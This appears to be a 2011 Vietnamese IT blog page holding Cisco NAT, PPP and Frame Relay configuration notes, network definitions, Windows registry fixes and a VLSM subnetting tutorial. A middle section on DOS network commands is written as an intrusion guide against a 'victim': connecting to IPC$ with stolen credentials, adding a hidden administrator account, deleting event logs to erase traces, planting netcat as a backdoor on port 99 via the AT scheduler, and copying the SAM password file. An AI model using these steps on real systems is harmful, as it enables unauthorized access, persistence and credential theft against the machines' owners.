Thứ Sáu, 12 tháng 8, 2011

Định nghĩa MTU, MSS và RWIN

MTU là gì ? :
MTU (Maximum Tranmission Unit) là đơn vị truyền tải dữ liệu lớn nhất của modem, số lượng dữ liệu lớn nhất hay kích thước lớn nhất có thể của 'gói' dữ liệu (packet). Gói dữ liệu này còn chứa cả thông tin về tiêu đề, nội dung truyền tải (header and trailer).
Mức MTU tối ưu cho modem ADSL và ADSL 2+ là 1492, MTU cho truyền hình cáp như Medianet và SCTV (Cable connection) là 1500. MTU có thể chỉnh sửa trong Modem/Router

MSS là gì ?:
MSS (Maximum Segment Size) là kích thước mảnh dữ liệu (data) lớn nhất. Được tính theo công thức : MTU-40 (do không chứa header và trailer)
Mức MSS tối ưu cho ADSL là 1452, MTU cho truyền hình cáp (Cable connection) là 1460.

TCP Window
(RWIN) là gì ?:
TCP Window (TCP Receive Window hoặc RWIN) là bộ đệm (buffer) chứa số lượng dữ liệu máy tính chuẩn bị tiếp nhận. Là cấp số nhân chẵn của MSS. Nếu RWIN được xác lập quá lớn thì lượng dữ liệu thất thoát sẽ lớn trong trường hợp gói dữ liệu bị thất lạc hoặc hư hỏng, còn nếu ta chọn quá nhỏ tốc độ truyền dẫn sẽ rất chậm.

Lệnh ip-helper address dùng để làm gì ?

Thông thường gói tin broadcast sẽ bị chặn bởi mặc định, khi PC request IP, bằng gói broadcast, router sẽ chặn lại, trong tình huống DHCP server ko cùng subnet với client, lúc này ta cấu hình router này để cho phép nó chuyển gói tin request broadcast thành unicast đến DHCP server.

Thứ Ba, 9 tháng 8, 2011

Khắc phục lỗi không joint được vào domain windows

Vào Registry  HKLM\System\CurrentControlSet\Control\Lsa
Sửa lại giá trị của "forceguest" thành 0
Nếu chưa có "forceguest" thì tạo DWORD tên "forceguest" và gán giá trị là 0.

Thứ Hai, 8 tháng 8, 2011

Một số lệnh cấu hình NAT – PPP – Frame Relay hay dùng

I.Cấu hình NAT
  Cấu hình Static NAT
Cấu hình NAT trong chế độ Router(config). Các lệnh như sau

Router(config)#ip nat inside source static [inside local address] [inside global address]
Ví dụ:
R(config)#ip nat inside source statice 10.0.0.1 202.103.2.1 (Địa chỉ 10.10.0.1 sẽ được chuyển thành 202.103.2.1 khi
đi ra khỏi Router)

Sau khi cấu hình xong phải áp dụng vào cổng in và cổng out, trong ví dụ dưới đây, cổng Ethernet là công in, còn
cổng Serial là cổng out

Router(config)#interface ethernet 0
Router(config-if)#ip nat inside

Router(config)#interface serial 0
Router(config-if)#ip nat outside
  Cấu hình Dynamic NAT
Router(config)#ip nat pool [ tên pool] [A.B.C.D A1.B1.C1.D1] netmask [mặt nạ]
Router(config)#ip nat inside source list [số hiệu ACL] pool [tên pool]
Router(config)#access-list [số hiệu ACL] permit A.B.C.D windcard masks

Ví dụ:
R(config)#ip nat pool nat-pool1 179.9.8.80 179.9.8.95 netmask 255.255.255.0
R(config)#ip nat inside source list 1 pool nat-pool1
R(config)#access-list 1 permit 10.1.0.0 0.0.0.255

Sau đó áp vào cổng In và Out như Static NAT

Note: Giải địa chỉ inside local address và inside global address phải nằm trong giải cho phép của ACL
  Cấu hình PAT overload
o  Cấu hình overload với 1 địa chỉ IP cụ thể.
Router(config)#ip nat pool [tên pool] [ip global inside] [subnet mask]
Router(config)#ip nat inside source list [tên số hiệu ACL] pool [tên pool] overload
Router(config)#access-list [số hiệu] permit [địa chỉ] [windcard mask]

Ví dụ:
R(config)#access-list 2 permit 10.0.0.0 0.0.0.255
R(config)#ip nat pool nat-pool2 179.9.8.20 255.255.255.240
R(config)#ip nat inside source list 2 nat-pool2 overload

o  Cấu hình overload dùng địa chỉ của cổng ra.(Thường xuyên được dung hơn là trường hợp trên) 
Router(config)#ip nat inside source list [tên số hiệu ACL] interface [cổng ra] overload
Router(config)#access-list [số hiệu] permit [địa chỉ] [windcard mask]

Ví dụ:
R(config)#ip nat inside source list 3 interface serial 0 overload
R(config)#access-list 3 permit 10.0.0.0 0.0.0.255
  Các lệnh Clear NAT/PAT
Lệnh xóa tất cả dynamic nat trên toàn bộ các interface.
Router#clear ip nat translation *

Lệnh xóa các single nat trên từng interface
Router#clear ip nat translation [inside/outside] [global ip - local ip]

Lệnh xóa các extended nat trên từng interface
Router#clear ip nat translation protocol [inside/outside] [global ip - global port – local ip – local port]
  Kiểm tra và Debug các NAT và PAT
Router#show ip nat translation
Router#show ip nat statics
Router#debug ip nat
  Cấu hình DHCP
Router(config)#ip dhcp excluded-address ip-address (end-ip-address)
Router(config)#ip dhcp pool [tên pool]
Router(dhcp-config)#network addess subnetmask
Router(dhcp-config)#default-router address
Router(dhcp-config)#dns-server address
Router(dhcp-config)#netbios-name-server address
Router(dhcp-config)#domain-name tên domain
Router(dhcp-config)#lease ngày/giờ/phút
  Kiểm tra và troubleshoot cấu hình DHCP
Router#show ip dhcp binding
Router#debug ip dhcp server events
  Trong trường hợp DHCP server không nằm cùng mạng với host
Note: khi DHCP server không cùng mạng với host thì ta phải dùng lệnh ip helper-address giúp host đến DHCP
server.

Router(config)#interface [cổng nằm cùng mạng với host]
Router(config-if)#ip helper-address [địa chỉ của DHCP server]

Note: Trong trường hợp muốn gói tin của host được broadcast ở mạng chứa DHCP thì ta dùng thêm lệnh ip
directed-broadcast ở cổng cùng mạng với DHCP server

Router(config)#interface [cổng nằm cùng mạng với dhcp]
Router(config-ì)#ip directed-broadcast

II. Cấu hình PPP

1. Cấu hình cơ bản:

R(config)#interface serial 0/0
R(config-if)#encapsulation ppp

2. Cấu hình PAP

Cấu hình PAP không yêu cầu hai Router giống nhau về password nhưng CHAP thì phải có.

(Cấu hình trên RA)
R(config)#host RA
RA(config)#username RB password 321
RA(config-if)#encapsulation ppp
RA(config-if)#ppp authentication pap
RA(config-if)#ppp pap sent-username RA password 123 

(Cấu hình trên RB)
R(config)#host RB
RB(config)#username RA password 123
RB(config-if)#encapsulation ppp
RB(config-if)#ppp authentication pap
RB(config-if)#ppp pap sent-username RB password 321

3. Cấu hình CHAP. (yêu cầu phải giống nhau về password)

(Cấu hình trên RA)
R(config)#host RA
RA(config)#username RB password 123
RA(config-if)encapsulation ppp
RA(config-if)ppp authentication chap

(Cấu hình trên RB)

R(config)#host RB
RB(config)#username RA password 123
RB(config-if)encapsulation ppp
RB(config-if)ppp authentication chap

4. Các cấu hình khác của PPP

a. Cấu hình Multilink

R(config-if)#encapsulation ppp
R(config-if)#ppp multilink

b. Cấu hình Compression

R(config-if)#encapsulation ppp
R(config-if)#compress [predictor/stac/mppc]

c. Cấu hình Error detection

R(config-if)#encapsulation ppp
R(config-if)#ppp quality [phần trăm]

5. Các lệnh kiểm tra cấu hình PPP

R#show interface (xem encapsulation)
R#debug ppp negotiation (Xem quá trình kết nối giữa 2 node)
R#debug ppp authentication (Xem quá trình xác thực giữa 2 node)

III. Cấu hình Frame-Relay

1. Cấu hình đơn giản

R(config-if)#encapsulation frame-relay {ciso| ietf} (mặc định là cisco)

Khi lệnh này được thực thi, DLCI sẽ được Inverse ARP tự động map, người dùng không cần phải làm gì cả.

* Nhưng Inverse ARP không làm việc với các kết nối Hub-and-Spoke

2. Cấu hình Frame-relay static map

R(config-if)#encapsulation frame-relay
R(config-if)#frame-relay map ip remote–ip-address local-dlci [broadcast] [cisco| ietf] 
(ip address trong dòng lệnh trên chỉ lấy làm minh họa bởi nó rất phổ biến, chính xác phải là remote–protocol–
address)
Broadcast trong câu lệnh trên có 2 chức năng:
Forward broadcast khi multicast không được khởi động.
Đơn giản hóa cấu hình OSPF cho mạng nonbroadcast sử dụng FRelay.
Ví dụ:

R(config-if)#encapsulation frame-relay
R(config-if)#frame-relay map ip 192.168.2.1 100 broadcast

3. Cấu hình FR trong mạng None Broadcast MutiAccess

Trong mạng Broadcast khi 1 máy tính truyền frame tất cả các node lắng nghe frame nhưng chỉ có node cần nhận mới
nhận được.
Trong mạng None Broadcast khi 1 máy tính truyền frame thì chỉ có node cần nhận mới lắng nghe và nhận được
frame đó, các node còn lại thì không. Frame được truyền qua 1 virtual Circuit hoặc 1 thiết bị chuyển mạch.
Star topology có thể được coi như là 1 mạng Hub and Spoke.

4. Giải quyết vấn đề với Routing Updates mà không disable Split Horizal

Giải pháp dùng Sub-interface

R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)interface s0/0.1 [multipoint| point-to-point]

point-to-point: Mỗi subinterface có subnet riêng của mình. Broadcast và Split horizol không là vấn đề.
Multi-point: Tất cả các subinterface liên quan phải cùng chung 1 subnet và như vậy Broadcast và Split horizol sẽ có
vấn đề.

Ví dụ:
(Point-to-point)
R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)#interface s0/0.1 point-to-point
R(config-subif)#frame-relay interface-dlci 18

(Multipoint) 
R(config)#interface s0/0
R(config-if)#encapsulation frame-relay
R(config-if)#interface s0/0.2 multipoint
R(config-subif)#frame-relay interface-dlci 19
R(config-subif)#frame-relay interface-dlci 20

5. Cấu hình trên Frame-relay Switching (ví dụ)

R(config)#frame-relay switching
R(config)#interface s0/0
R(config-if)#encapsulation frame-relay 
R(config-if)#frame-relay intf-type dce
R(config-if)#frame-relay route 103interface serial 0/1 301
 

Bỏ thuộc tính ẩn file, thư mục do virus gây ra

Bình thường bạn có thể bỏ thuộc tính ẩn trong properties, nhưng do virus gây ra bạn không thể bỏ thuộc tính này được. Cách khắc phục đơn giản như sau:
Vào Start -> Run -> cmd. Gõ lệnh sau: attrib -s -h E:\* /S /D
Trong đó E là tên ổ đĩa.

Tập lệnh quan trọng DOS dùng để cấu hình và kiểm tra mạng LAN


1. Lệnh Ping : Cú pháp: Code: ping ip/host [/t][/a][/l][/n]
ip: địa chỉ IP của máy cần kiểm tra;
host là tên của máy tính cần kiểm tra.
Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.
- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C
- Tham số /a: Nhận địa chỉ IP từ tên host
- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số
hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính
(Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ
riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính
cùng ping một lượt.
- Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5
Công dụng : + Lệnh này được sử dụng để kiểm tra xem một máy tính có kết
nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang
ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối
với từng gói tin, bạn có thể xác định được tình trạng của đường truyền
(chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường
truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết
nối hay không (Nếu không kết nối,kết quả là Unknow host)....

2. Lệnh Tracert :

Cú pháp : Code: tracert ip/host
Công dụng : + Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói
tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua
các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một
server nào đó.

3. Lệnh Net Send : gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP).
Cú pháp: Net send ip/host thông_điệp_muốn_gởi
Công dụng: + Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi.
Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong
phòng vi tính của trường các bạn có thể dùng lệnh này để ghẹo mọi
người! Bạn cũng có thể gởi cho tất cả các máy tính trong mạng LAN theo
cấu trúc sau : Code: Net send * hello!I'm pro_hacker

4. Lệnh Netstat :
Cú pháp: Code: Netstat [/a][/e][/n]
- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)
- Tham số /e: hiển thị các thông tin thống kê Ethernet
- Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối... Ngoải ra còn một vài tham số khác
Các bạn hãy gõ Netstat /? để biết thêm Công dụng :
+ Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.

5. Lệnh IPCONFIG :
Cú pháp: Code: ipconfig /all
Công dụng: + Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn
đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...

6. Lệnh FTP (truyền tải file):
Cú pháp: Code: ftp ip/host
Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau:
Code: ftp>_ Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp,
thay vì dùng các chương trình kiểu Cute FTP, Flash FXP. Nếu kết nối
thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu
username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên
máy chủ.
Một số lệnh ftp cơ bản:
-cd thu_muc: chuyển sang thư mục khác trên máy chủ
- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ
- mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ
- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ
- put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.
- close: Đóng phiên làm việc
- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.
Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu.
Công dụng : + FTP là một giao thức được sử dụng để gửi và nhận file
giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác
dụng như một chương trình chạy trên nền console (văn bản), cho phép
thực hiện kết nối đến máy chủ ftp

7. Lệnh Net View :
Cú pháp: Code: Net View [\\computer|/Domain[:ten_domain]]
Công dụng: + Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các
máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
+ Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên
của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử
dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.

8. Lệnh Net Use :
Cú pháp: Code: Net use \\ip\ipc$ "pass" /user:"***"
- ip: địa chỉ IP của victim.
- ***: user của máy victim
- pass: password của user Giả sử ta có đc user và pass của victim có IP
là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi
đấy!
Ví dụ: user: vitim ; pass :12345 .
Ta dùng lệnh sau:
Code: Net use \\68.135.23.25\ipc$ "12345" /user:"victim"
Công dụng: + kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).

9. Lệnh Net User :
Cú pháp: Code: Net User [username pass] [/add]
- Username : tên user cấn add
- pass : password của user cần add Khi đã add được user vào rùi thì ta tiến hành add user này vào nhóm administrator.
Code: Net Localgroup Adminstrator [username] [/add]
Công dụng: + Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy
+ Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào.
Ví dụ: ta tiến hành add thêm một user có tên là uanhoa , password là :banvatoi vào với cấu trúc lệnh như sau:
Code: Net User xuanhoa banvatoi /add
Sau đó add user xuanhoa vào nhóm adminnistrator
Code: Net Localgroup Administrator xuanhoa /add

10. Lệnh Shutdown:

Cú pháp: Code: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up x:yy] (áp dụng cho win XP)
- Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,..
- Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown.
- Tham số -l : logg off (lưu ý ko thể thực hiện khi remote)
- Tham số -s : shutdown
- Tham số -r : shutdown và restart
- Tham số -a : không cho shutdown
- Tham số -f : shutdown mà ko cảnh báo
- Tham số -c "comment" : lời cảnh báo trước khi shutdown
- Tham số -d up x:yy : ko rõ Code: shutdown \\ip (áp dụng win NT)
Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn!
Công dụng: + Shutdown máy tính.

11. Lệnh DIR :

Cú pháp: Code: DIR [drive:][path][filename] Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn.
Để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn.
Công dụng: + Để xem file, folder.

12. Lệnh DEL :

Cú pháp: Code: DEL [drive:][path][filename] Lệnh này cũng căn bản rùi, ko phải nói nhìu.
Công dụng: Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta
phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.
Sau đây là những files nhật ký của Win NT:
Code: del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt del C:\winnt\*.log

13. Lệnh tạo ổ đĩa ảo trên computer:
Cú pháp:
Code: Net use z: \\ip\C$ ( hoặc là IPC$ )
- Z là của mình...còn C$ là của Victim
Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này mình cũng không nắm rõ nên ko thể hướng dẫn chi tiết đc)

14. Lệnh Net Time :

Cú pháp: Code: Net Time \\ip
Công dụng: + Cho ta biết thời gian của victim, sau đó dùng lệnh AT để
khởi động chương trình. (các bạn có thể tham khảo lệnh AT tại phần
basic to hacking ở phần hacking and securities trong diễn đàn dttx.org)

15. Lệnh AT:

Cú pháp: Code: AT \\ip
Công
dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì
ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc
backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng.
Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của
NETCAT....nó là một telnet server với port 99) và đc copy lên máy
victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là :
68.135.23.25 .
Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim,
ví dụ : 12:00. Code: AT \\68.135.23.25 12:3 nc.exe Đợi đến 12:3 là nó
sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.

16. Lệnh Telnet:
Cú pháp: Code: telnet host port
Gõ telnet /? để biết thêm chi tiết.
Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKie
Code: telnet 68.135.23.25 99
Công dụng: + Kết nối đến host qua port xx

17. Lệnh COPY:

Cú pháp: Code: COPY /? Dùng lệnh trên để rõ hơn!
Công dụng: + Copy file, ở đây chắc mình khỏi nói thêm nhé.
Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Code: Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Code: Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :
Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
lưu ý : code ở đây được hiểu là mã lệnh các bạn không nên gõ vào chữ
code, nếu gõ code thì các bạn không thực hiện được những dòng mã lệnh
phía trên đâu

18. Lệnh SET:
Cú pháp: Code: SET
Công dụng: + Displays, sets, or removes cmd.exe enviroment variables.

19. Lệnh Nbtstat:
Cú pháp: Code: Nbtstat /? Gõ lệnh trên để rõ hơn về lệnh này.
Công dụng: + Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP)

Khắc phục lỗi "tất cả các chương trình đang hoạt động đều không hiển thị lên thanh taskbar"


Cách xử lý: Mở notepad, copy doạn code này, lưu lại với phần mở rộng .REG
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics]
"BorderWidth"="0"
"CaptionFont"=hex:f3,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,bc,02,00,00,\
  00,00,00,01,00,00,00,00,54,00,72,00,65,00,62,00,75,00,63,00,68,00,65,00,74,\
  00,20,00,4d,00,53,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"CaptionHeight"="-375"
"CaptionWidth"="-270"
"IconFont"=hex:f5,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,90,01,00,00,00,\
  00,00,01,00,00,00,00,54,00,61,00,68,00,6f,00,6d,00,61,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"IconSpacing"="-1125"
"IconVerticalspacing"="-1125"
"MenuFont"=hex:f5,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,90,01,00,00,00,\
  00,00,01,00,00,00,00,54,00,61,00,68,00,6f,00,6d,00,61,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"MenuHeight"="-285"
"MenuWidth"="-270"
"MessageFont"=hex:f5,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,90,01,00,00,\
  00,00,00,01,00,00,00,00,54,00,61,00,68,00,6f,00,6d,00,61,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"ScrollHeight"="-255"
"ScrollWidth"="-255"
"Shell Icon BPP"="16"
"SmCaptionFont"=hex:f5,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,bc,02,00,\
  00,00,00,00,01,00,00,00,00,54,00,61,00,68,00,6f,00,6d,00,61,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"SmCaptionHeight"="-255"
"SmCaptionWidth"="-255"
"StatusFont"=hex:f5,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,90,01,00,00,\
  00,00,00,01,00,00,00,00,54,00,61,00,68,00,6f,00,6d,00,61,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"AppliedDPI"=dword:00000060
"Shell Icon Size"="32"
"MinAnimate"="0"
"IconTitleWrap"="0"
"MinWidth"="-1500"
"MinHorzGap"="0"
"MinVertGap"="0"
"MinArrange"="8"

Show hide device in Device Manager

1. Click Start, point to All Programs, point to Accessories, and then click Command Prompt.
At a command prompt, type the following command , and then press ENTER:
set devmgr_show_nonpresent_devices=1

2. Type the following command a command prompt, and then press ENTER:
start devmgmt.msc

Hướng dẫn chia địa chỉ mạng con theo phương pháp tối ưu VLSM

    Qua quá trình giảng dạy các sinh viên, được biết một số bạn vẫn còn bỡ ngỡ với cách
chia địa chỉ mạng con theo VLSM, phương pháp này sẽ giúp chúng ta kiểm soát được số
mạng mới sinh ra, số mạng đã dùng, số mạng dư thừa còn lại, sau đây tôi sẽ hướng dẫn
các  bạn thực hiện việc này  một cách dễ dàng  bằng ví dụ minh họa. Trước hết, chúng ta
phải hiểu rõ cấu trúc của địa chỉ IP v4 và ý nghĩa của một số khái niệm: ví dụ các lớp địa
chỉ IP v4, Net_id, host_id, Subnet Mask, giải địa chỉ khả dụng, địa chỉ mạng, …
  Để chia thành thạo, chúng ta cần nắm rõ một số khái niệm và công thức sau đây:
- Bit, byte. 
- Khái niệm về số nhị phân, thập phân.
- Phép toán AND
- Các biến đổi từ nhị phân sang thập phân, từ thập phân sang nhị phân.
- Cấu trúc địa chỉ IP, giới hạn của các lớp IP
- Khái niệm về default mask, mask, subnet, subneting ....! 
- Các địa chỉ riêng
Lưu ý: 
- Địa chỉ mạng (subnet) : tất cả các bit dành cho phần host bằng 0
- Địa chỉ broadcast: tất cả các bit dành cho phần host bằng 1.
- Địa chỉ đầu tiên hợp lệ: là địa chỉ liền sau địa chỉ mạng (subnet)
- Địa chỉ cuối cùng hợp lệ: là địa chỉ liền trước địa chỉ broadcast
=> phải hiểu rõ và phân biệt khái niệm n và m là gì để áp dụng công thức cho đúng

-  Công thức:
+ Số subnet được tạo ra: 2m  (m: số bit mượn của phần Host ID) (Chú ý: đáng lẽ
công thức này phải là 2m – 2 vì phải loại trừ đi 2 mạng đầu tiên – subnet zero và
mạng cuối cùng – subnet broadcast, nhưng với các dòng Router hiện nay của Cisco
đã hỗ trợ lệnh Router(config)# ip subnet-zero do đó ta vẫn có thể sử dụng 2 mạng
đó mà không phải loại trừ bỏ đi)
+ Số host / subnet: 2n – 2 (n: số bit còn lại của phần Host ID sau khi bị mượn m bit)
+ Subnet Mask mới = Subnet Mask cũ + m
+ Địa chỉ khả dụng là các địa chỉ IP có thể gán cho mỗi host, thiết bị 

(Lưu ý:  có  nhiều cách  hoặc thủ thuật để tính địa chỉ mạng con, nhưng cách nào cũng
phải dựa vào nền tảng gốc đó là sự thay đổi các bit mượn để sinh ra mạng con mới, do
đó tốt nhất chúng ta nên tham khảo theo phương pháp VLSM)

------------------------------------------------------------------------------------------------------------

VÍ DỤ MẪU 1: Cho giải địa chỉ 172.35.0.0/16
, hãy Subnet để cấp cho các mạng con:
A: 320 host
B: 115 host
C: 80 host
D: 30 host
E: 2 host
F: 2 host
G: 2 host
 theo phương pháp VLSM?

Hướng dẫn giải mẫu:
- Theo đầu bài cho địa chỉ ban đầu là X: 172.35.0.0/16
=> đổi ra hệ nhị phân ta được:
10101100.00100011.00000000.00000000 
11111111.11111111.00000000.00000000

(Phần gạch chân chính là phần bit host, việc chia từ địa chỉ trên thành nhiều Subnet chính
là việc biến đổi – hay gọi là mượn các bit phần host_id thành các bit Net_id)
- B1: Theo VLSM thì ta sẽ phải chia X cho các mạng theo chiều giảm dần, tức là chia
cho mạng có số host cao nhất rồi thấp nhất cuối cùng-> sắp xếp lại ta có:
+A: 320
+B:115
+C:80
+D:30
+E:2
+F:2
+G:2
- B2: +Thực hiện chia X cho mạng A đầu tiên, áp dụng công thức: 2n  - 2 ≥ 320 => n=9
(chính  là số bit còn  lại chưa bị mượn) => số bit đã  mượn là  m= 32 (là tổng số bit của 1
địa chỉ IP v4) – 16 (số bit thuộc phần Net_id của địa chỉ đã cho) – 9 ( số bit còn lại) = 7
=> SM’ (Subnet Mask mới) = SM (Subnet Mask cũ) + m = 16 + 7 = 23 ( viết tắt là /23)
&  số Subnet (mạng con) được tạo ra là: 2m = 27 = 128 
 với SM’ thay đổi từ /16 thành /23 (các bit trong khoảng này của X đã chuyển sang Octet
thứ 3) nên ta có

------------------------------------------------------------------------------------------------------------
                     | Octet 3 |        
   101100.00100011.00000000.00000000
    172.           16.            0.             0   
(bit  màu  đen không in đậm  &  bị gạch chân  chính  là  7  bit  vừa mượn,  việc sinh ra các
Subnet con chính là dựa vào việc thay đổi vị trí và giá trị từ 0 thành 1 của những bit này)
Vậy các mạng con được sinh ra từ X là:
                                                        | Octet 3 |
Mạng X1:      10101100.00100011.00000000.00000000  -> 172.35.0.0/23                                   
Mạng X2:      10101100.00100011.00000010.00000000  -> 172.35.2.0/23    
Mạng X3:      10101100.00100011.00000100.00000000  -> 172.35.4.0/23
………………… vân vân ………………….
Mạng X127:  10101100.00100011.11111100.00000000  -> 172.35.252.0/23
Mạng X128:  10101100.00100011.11111110.00000000  -> 172.35.254.0/23

=> lấy mạng con đầu tiên X1: 172.35.0.0/23 cấp cho mạng A: 320 host
+ Tiếp theo, lấy mạng X2 (là địa chỉ mạng lớn nhất tiếp theo) chia cho mạng B:115 host.
Tương tự trên, theo công thức:  2n - 2 ≥ 115 => n=7 => m = 32-23-7 = 2
=> SM’ (Subnet Mask mới) = SM (Subnet Mask cũ) + m = 23 +2 = 25 ( viết tắt là /25)
&  số Subnet (mạng con) được tạo ra là: 2m = 22 = 4 
với SM thay đổi từ /23 thành /25 (các bit trong khoảng này của X2 liên quan đến cả Octet
3 và Octet thứ 4) nên ta có các mạng con mới sinh ra từ X2:
                                                      | Octet 3 |    | Octet 4 |
Mạng X21:     10101100.00100011.00000010.00000000  -> 172.35.2.0/25                                     
Mạng X22:     10101100.00100011.00000010.10000000  -> 172.35.2.128/25  
Mạng X23:     10101100.00100011.00000011.00000000  -> 172.35.3.0/25 
Mạng X24:     10101100.00100011.00000011.10000000  -> 172.35.3.128/25  

=> lấy mạng X21: 172.35.2.0/25 cấp cho mạng B: 115 host
+ Tiếp theo, ta sử dụng mạng con X22: 172.35.2.128/25 để chia cho mạng C: 80 host
Tương tự trên, theo công thức:  2n - 2 ≥ 80 => n=7 => m = 32-25-7 = 0 (Vừa đẹp, khi giá
trị m=0 điều này chứng tỏ là mạng đang chia chỉ có thể cấp vừa đủ hoặc thừa một số IP
cho mạng có số host đang yêu cầu, ở đây là 115 host- chú ý: khi sử dụng VLSM thì m sẽ
không bao giờ nhận giá trị âm)
=> cấp luôn X22 cho mạng C: 80 host
+ Lúc này cần phải dùng đến giải địa chỉ X23 để chia cho mạng D: 30 host
Tương tự trên, theo công thức:  2n - 2 ≥ 30 => n=5 => m = 32-25-5 = 2
=> SM’ (Subnet Mask mới) = SM (Subnet Mask cũ) + m = 25 +2 = 27 ( viết tắt là /27)
